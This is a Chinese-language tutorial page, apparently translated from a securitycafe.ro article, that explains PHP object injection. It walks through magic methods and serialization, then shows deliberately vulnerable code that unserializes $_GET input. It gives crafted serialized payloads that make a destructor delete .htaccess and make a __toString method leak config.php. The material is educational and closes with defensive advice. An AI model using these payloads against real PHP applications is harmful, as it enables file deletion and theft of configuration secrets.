文章詳情頁

詳析php對象注入漏洞

瀏覽：50日期：2022-09-13 10:45:13

0x00 背景

php對象注入是一個非常常見的漏洞，這個類型的漏洞雖然有些難以利用，但仍舊非常危險，為了理解這個漏洞，請讀者具備基礎的php知識。

0x01 漏洞案例

如果你覺得這是個渣渣洞，那么請看一眼這個列表，一些被挖到過該漏洞的系統，你可以發現都是一些耳熟能詳的玩意(就國外來說)

WordPress 3.6.1

Magento 1.9.0.1

Joomla 3.0.3

Ip board 3.3.5

除此之外等等一堆系統，八成可能大概在這些還有其他的php程序中還有很多這種類型的漏洞，所以不妨考慮坐下喝杯咖啡并且試著去理解這篇文章。

0x01 PHP類和對象類和變量是非常容易理解的php概念，打個比方，下面的代碼在一個類中定義了一個變量和一個方法。<?php class TestClass { // 一個變量 public $variable = ’This is a string’; // 一個簡單的方法 public function PrintVariable() { echo $this->variable; } } // 創建一個對象 $object = new TestClass(); // 調用一個方法 $object->PrintVariable(); ?> 它創建了一個對象并且調用了 PrintVariable 函數，該函數會輸出變量 variable。如果想了解更多關于php面向對象編程的知識請點： http://php.net/manual/zh/language.oop5.php0x02 php magic方法php類可能會包含一些特殊的函數叫magic函數，magic函數命名是以符號“__”開頭的，比如 __construct, __destruct, __toString, __sleep, __wakeup 和其他的一些玩意。這些函數在某些情況下會自動調用，比如:__construct 當一個對象創建時調用 (constructor) __destruct 當一個對象被銷毀時調用 (destructor) __ toString當一個對象被當作一個字符串使用為了更好的理解magic方法是如何工作的，讓我們添加一個magic方法在我們的類中。<?php class TestClass { // 一個變量 public $variable = ’This is a string’; // 一個簡單的方法 public function PrintVariable() { echo $this->variable . ’ ’; } // Constructor public function __construct() { echo ’__construct ’; } // Destructor public function __destruct() { echo ’__destruct ’; } // Call public function __toString() { return ’__toString ’; } } // 創建一個對象 // __construct會被調用 $object = new TestClass(); // 創建一個方法 // ’This is a string’ 這玩意會被輸出 $object->PrintVariable(); // 對象被當作一個字符串 // __toString 會被調用 echo $object; // End of PHP script // php腳本要結束了， __destruct會被調用 ?> 我們往里頭放了三個 magic方法，__construct, __destruct和 __toString，你可以看出來，__construct在對象創建時調用， __destruct在php腳本結束時調用，__toString在對象被當作一個字符串使用時調用。這個腳本會輸出這狗樣：__constructThis is a string__toString__destruct這只是一個簡單的例子，如果你想了解更多有關magic函數的例子，請點擊下面的鏈接：http://php.net/manual/zh/language.oop5.magic.php0x03 php對象序列化php允許保存一個對象方便以后重用，這個過程被稱為序列化，打個比方，你可以保存一個包含著用戶信息的對象方便等等重用。為了序列化一個對象，你需要調用 “serialize”函數，函數會返回一個字符串，當你需要用到這個對象的時候可以使用“unserialize”去重建對象。讓我們在序列化丟進那個例子，看看序列化長什么樣。<?php // 某類 class User { // 類數據 public $age = 0; public $name = ’’; // 輸出數據 public function PrintData() { echo ’User ’ . $this->name . ’ is ’ . $this->age . ’ years old. ’; } } // 創建一個對象 $usr = new User(); // 設置數據 $usr->age = 20; $usr->name = ’John’; // 輸出數據 $usr->PrintData(); // 輸出序列化之后的數據 echo serialize($usr); ?> 它會輸出User John is 20 years old.O:4:'User':2:{s:3:'age';i:20;s:4:'name';s:4:'John”;}你可以看到序列化之后的數據中有 20和John，其中沒有任何跟類有關的東西，只有其中的數據被數據化。為了使用這個對象，我們用unserialize重建對象。<?php // 某類 class User { // Class data public $age = 0; public $name = ’’; // Print data public function PrintData() { echo ’User ’ . $this->name . ’ is ’ . $this->age . ’ years old. ’; } } // 重建對象 $usr = unserialize(’O:4:'User':2:{s:3:'age';i:20;s:4:'name';s:4:'John';}’); // 調用PrintData 輸出數據 $usr->PrintData(); ?> 這會輸出User John is 20 years old0x04 序列化magic函數magic函數constructor (__construct)和 destructor (__destruct) 是會在對象創建或者銷毀時自動調用，其他的一些magic函數會在serialize 或者 unserialize的時候被調用。__sleep magic方法在一個對象被序列化的時候調用。 __wakeup magic方法在一個對象被反序列化的時候調用。注意 __sleep 必須返回一個數組與序列化的變量名。<?php class Test { public $variable = ’BUZZ’; public $variable2 = ’OTHER’; public function PrintVariable() { echo $this->variable . ’ ’; } public function __construct() { echo ’__construct ’; } public function __destruct() { echo ’__destruct ’; } public function __wakeup() { echo ’__wakeup ’; } public function __sleep() { echo ’__sleep ’; return array(’variable’, ’variable2’); } } // 創建一個對象，會調用 __construct $obj = new Test(); // 序列化一個對象，會調用 __sleep $serialized = serialize($obj); //輸出序列化后的字符串 print ’Serialized: ’ . $serialized . ’; // 重建對象，會調用 __wakeup $obj2 = unserialize($serialized); //調用 PintVariable, 會輸出數據 (BUZZ) $obj2->PrintVariable(); // php腳本結束，會調用 __destruct ?> 這玩意會輸出：__construct__sleepSerialized: O:4:'Test':2:{s:8:'variable';s:4:'BUZZ';s:9:'variable2';s:5:'OTHER';}__wakeupBUZZ__destruct__destruct你可以看到，我們創建了一個對象，序列化了它(然后__sleep被調用)，之后用序列化對象重建后的對象創建了另一個對象，接著php腳本結束的時候兩個對象的__destruct都會被調用。更多相關的內容http://php.net/manual/zh/language.oop5.serialization.php0x05 php對象注入現在我們理解了序列化是如何工作的，我們該如何利用它?事實上，利用這玩意的可能性有很多種，關鍵取決于應用程序的流程與，可用的類，與magic函數。記住序列化對象的值是可控的。你可能會找到一套web程序的源代碼，其中某個類的__wakeup 或者 __destruct and其他亂七八糟的函數會影響到web程序。打個比方，我們可能會找到一個類用于臨時將日志儲存進某個文件，當__destruct被調用時，日志文件會被刪除。<?php class LogFile { // log文件名 public $filename = ’error.log’; // 某代碼，儲存日志進文件 public function LogData($text) { echo ’Log some data: ’ . $text . ’ ’; file_put_contents($this->filename, $text, FILE_APPEND); } // Destructor 刪除日志文件 public function __destruct() { echo ’__destruct deletes '’ . $this->filename . ’' file. ’; unlink(dirname(__FILE__) . ’/’ . $this->filename); } } ?> 某例子關于如何使用這個類<?php include ’logfile.php’; // 創建一個對象 $obj = new LogFile(); // 設置文件名和要儲存的日志數據 $obj->filename = ’somefile.log’; $obj->LogData(’Test’); // php腳本結束啦，__destruct被調用，somefile.log文件被刪除。 ?> 在其他的腳本，我們可能又恰好找到一個調用“unserialize”函數的，并且恰好變量是用戶可控的，又恰好是$_GET之類的。<?php include ’logfile.php’; // ... 一些狗日的代碼和 LogFile 類 ... // 簡單的類定義 class User { // 類數據 public $age = 0; public $name = ’’; // 輸出數據 public function PrintData() { echo ’User ’ . $this->name . ’ is ’ . $this->age . ’ years old. ’; } } // 重建用戶輸入的數據 $usr = unserialize($_GET[’usr_serialized’]); ?> 你看，這個代碼調用了 “LogClass” 類，并且有一個 “unserialize” 值是我們可以注入的。所以構造類似這樣的東西：script.php?usr_serialized=O:4:'User':2:{s:3:'age';i:20;s:4:'name';s:4:'John”;}究竟發生了什么呢，因為輸入是可控的，所以我們可以構造任意的序列化對象，比如：<?php $obj = new LogFile(); $obj->filename = ’.htaccess’; echo serialize($obj) . ’ ’; ?> 這個會輸出O:7:'LogFile':1:{s:8:'filename';s:9:'.htaccess';}__destruct deletes '.htaccess' file.現在我們將構造過后的序列化對象發送給剛才的腳本：script.php?usr_serialized=O:7:'LogFile':1:{s:8:'filename';s:9:'.htaccess”;}這會輸出__destruct deletes '.htaccess' file.現在 .htaccess 已經被干掉了，因為腳本結束時 __destruct會被調用。不過我們已經可以控制“LogFile”類的變量啦。這就是漏洞名稱的由來：變量可控并且進行了unserialize操作的地方注入序列化對象，實現代碼執行或者其他坑爹的行為。雖然這不是一個很好的例子，不過我相信你可以理解這個概念，unserialize自動調用 __wakeup 和 __destruct，接著攻擊者可以控制類變量，并且攻擊web程序。0x06 常見的注入點先不談 __wakeup 和 __destruct，還有一些很常見的注入點允許你利用這個類型的漏洞，一切都是取決于程序邏輯。打個比方，某用戶類定義了一個__toString為了讓應用程序能夠將類作為一個字符串輸出(echo $obj) ,而且其他類也可能定義了一個類允許__toString讀取某個文件。<?php // … 一些include ... class FileClass { // 文件名 public $filename = ’error.log’; //當對象被作為一個字符串會讀取這個文件 public function __toString() { return file_get_contents($this->filename); } } // Main User class class User { // Class data public $age = 0; public $name = ’’; // 允許對象作為一個字符串輸出上面的data public function __toString() { return ’User ’ . $this->name . ’ is ’ . $this->age . ’ years old. ’; } } // 用戶可控 $obj = unserialize($_GET[’usr_serialized’]); // 輸出 __toString echo $obj; ?> so,我們構造urlscript.php?usr_serialized=O:4:'User':2:{s:3:'age';i:20;s:4:'name';s:4:'John”;}再想想，如果我們用序列化調用 FileClass呢我們創建利用代碼<?php $fileobj = new FileClass(); $fileobj->filename = ’config.php’; echo serialize($fileobj); ?> 接著用生成的exp注入urlscript.php?usr_serialized=O:9:'FileClass':1:{s:8:'filename';s:10:'config.php”;}接著網頁會輸出 config.php的源代碼<?php $private_data = ’MAGIC’; ?> ps:我希望這讓你能夠理解。0x07 其他的利用方法可能其他的一些magic函數海存在利用點：比如__call 會在對象調用不存在的函數時調用，__get 和 __set會在對象嘗試訪問一些不存在的類，變量等等時調用。不過需要注意的是，利用場景不限于magic函數，也有一些方式可以在一半的函數中利用這個漏洞，打個比方，一個模塊可能定義了一個叫get的函數進行一些敏感的操作，比如訪問數據庫，這就可能造成sql注入，取決于函數本身的操作。唯一的一個技術難點在于，注入的類必須在注入點所在的地方，不過一些模塊或者腳本會使用“autoload”的功能，具體可以在這里了解http://php.net/manual/zh/language.oop5.autoload.php0x08 如何利用或者避免這個漏洞別在任何用戶可控的地方使用“unserialize”，可以考慮“json_decode“0x09 結論雖然很難找到而且很難利用，但是這真的真的很嚴重，可以導致各種各樣的漏洞。原文:http://securitycafe.ro/2015/01/05/understanding-php-object-injection/

PHP

上一條：PHP獲取上周、本周、上月、本月、本季度、上季度時間方法大全下一條：PHP使用代理訪問網站方法

相關文章：

1. IntelliJ IDEA導入jar包的方法2. docker鏡像完全卸載的操作步驟3. idea刪除項目的操作方法4. 使用Maven 搭建 Spring MVC 本地部署Tomcat的詳細教程5. IntelliJ IDEA配置Tomcat服務器的方法6. IntelliJ IDEA調整字體大小的方法7. idea重置默認配置的方法步驟8. idea導入maven項目的方法9. IntelliJ IDEA設置默認瀏覽器的方法10. IntelliJ IDEA安裝插件的方法步驟

排行榜

					
					docker鏡像完全卸載的操作步驟
IntelliJ IDEA導入jar包的方法
使用Maven 搭建 Spring MVC 本地部署Tomcat的詳細教程
IntelliJ IDEA配置Tomcat服務器的方法
idea刪除項目的操作方法
IntelliJ IDEA恢復刪除文件的方法
IntelliJ IDEA調整字體大小的方法
IntelliJ IDEA設置默認瀏覽器的方法
IntelliJ IDEA安裝插件的方法步驟
idea打開多個窗口的操作方法
Docker 部署 Prometheus的安裝詳細教程
				